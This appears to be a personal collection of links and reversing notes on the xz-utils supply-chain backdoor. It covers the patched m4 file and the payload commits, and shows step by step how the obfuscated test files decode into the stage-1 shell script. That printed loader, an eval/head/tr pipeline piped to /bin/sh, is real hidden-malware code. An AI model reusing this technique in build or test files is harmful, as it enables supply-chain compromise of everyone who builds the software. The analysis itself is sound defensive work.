A collection of resources about the xz-utils backdoor
// the security note (SECURITY.md), patched by JiaT75 themselves
https://salsa.debian.org/debian/xz-utils/-/blame/b43c3e48bf6097095eef36d44cdbec811074940a/.github/SECURITY.md#L12
// the patched m4 file in Debian sid
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L63
// backport of 5.6.0
https://salsa.debian.org/debian/xz-utils/-/commit/12388833e66a4ddafe08571882ad638a511cf68b?page=10#71e626f2c3f59e8b311f7777379f651145fda3d3
// reading the payload: stage 0 -> stage 1
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L95
// the build-to-host.m4 patch (diff)
https://www.diffchecker.com/DxS4Wz01/
// xzbot
https://github.com/amlweems/xzbot
// targets only the x86_64 architecture
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L29
// targets only the GNU linker
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L51
// reversing the doubly-obfuscated payload
https://gynvael.coldwind.pl/?lang=en&id=782
// the payloads (commit)
https://git.tukaani.org/?p=xz.git;a=commit;h=6e636819e8f070330d835fce46289a3ff72a7b89
// the xz shell script (analysis)
https://research.swtch.com/xz-script
// file rename (delaying the attack?)
https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea
// reversing
// remap the characters (tr)
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" > bad-3-corrupt_lzma2_remap.xz | |
// diff the two binaries (hexdump)
❯ diff <(xxd tests_files_bad-3-corrupt_lzma2.xz) <(xxd bad-3-corrupt_lzma2_remap.xz) | |
7,8c7,8 | |
< 00000060: e005 1601 5f5d 0005 20a5 2d55 bb98 047c ...._].. .-U...| | |
< 00000070: c699 bca0 664d cd31 ad0b 2920 b828 0c2e ....fM.1..) .(.. | |
--- | |
> 00000060: e005 1601 2d5d 0005 09a5 5f55 bb98 047c ....-]...._U...| | |
> 00000070: c699 bca0 664d cd31 ad0b 2909 b828 0c2e ....fM.1..)..(.. | |
12c12 | |
< 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f2d .I.`?......[.a.- | |
--- | |
> 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f5f .I.`?......[.a._ | |
18,19c18,19 | |
< 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 09ac 2a24 n..).l.X.w,(..*$ | |
< 00000120: 1320 1921 7c03 4a30 b202 1898 d120 2034 . .!|.J0..... 4 | |
--- | |
> 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 20ac 2a24 n..).l.X.w,( .*$ | |
> 00000120: 1309 1921 7c03 4a30 b202 1898 d109 0934 ...!|.J0.......4 | |
// the real stage 1: the decompressed output is a shell script
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d | |
####Hello#### | |
#�U��$� | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
eval `grep ^srcdir= config.status` | |
if test -f ../../config.status;then | |
eval `grep ^srcdir= ../../config.status` | |
srcdir="../../$srcdir" | |
fi | |
// discard 1 KiB, take 2 KiB, discard 1 KiB, ..., take the final 939 bytes
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh | |
####World#### | |
// extract the stage 2 payload
./take_relevant-step3.sh | |
xz -F raw --lzma1 -dc good-large_uncompressed_remap.bi |